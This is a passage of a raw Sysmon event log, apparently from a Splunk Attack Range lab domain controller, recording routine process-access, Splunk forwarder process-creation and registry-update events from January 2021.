16:12:10.094{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.094{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.094{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.094{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.094{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-565A-6008-0B07-00000000A301}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.094{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-565A-6008-0B07-00000000A301}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:10.094{7901BC46-565A-6008-0B07-00000000A301}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.516{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-565B-6008-0D07-00000000A301}3292C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.516{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.516{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.516{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.516{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.516{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-565B-6008-0D07-00000000A301}3292C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.516{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-565B-6008-0D07-00000000A301}3292C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.516{7901BC46-565B-6008-0D07-00000000A301}3292C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:12:11.000{7901BC46-565A-6008-0C07-00000000A301}64165472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000031280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:12:39.530{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ef47-0x130c7bbd) 13241300x800000000000000031283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:13:02.108{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000031282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:13:02.093{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\32DFA675-0D71-42BD-A7E4-DA19B09BA9BB\Config SourceDWORD (0x00000001) 13241300x800000000000000031281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:13:02.093{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\32DFA675-0D71-42BD-A7E4-DA19B09BA9BB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_32DFA675-0D71-42BD-A7E4-DA19B09BA9BB.XML 10341000x800000000000000031299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.971{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5693-6008-0F07-00000000A301}6780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.967{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.967{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.967{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.967{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.967{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5693-6008-0F07-00000000A301}6780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.967{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5693-6008-0F07-00000000A301}6780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.968{7901BC46-5693-6008-0F07-00000000A301}6780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.296{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5693-6008-0E07-00000000A301}7708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:13:07.296{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 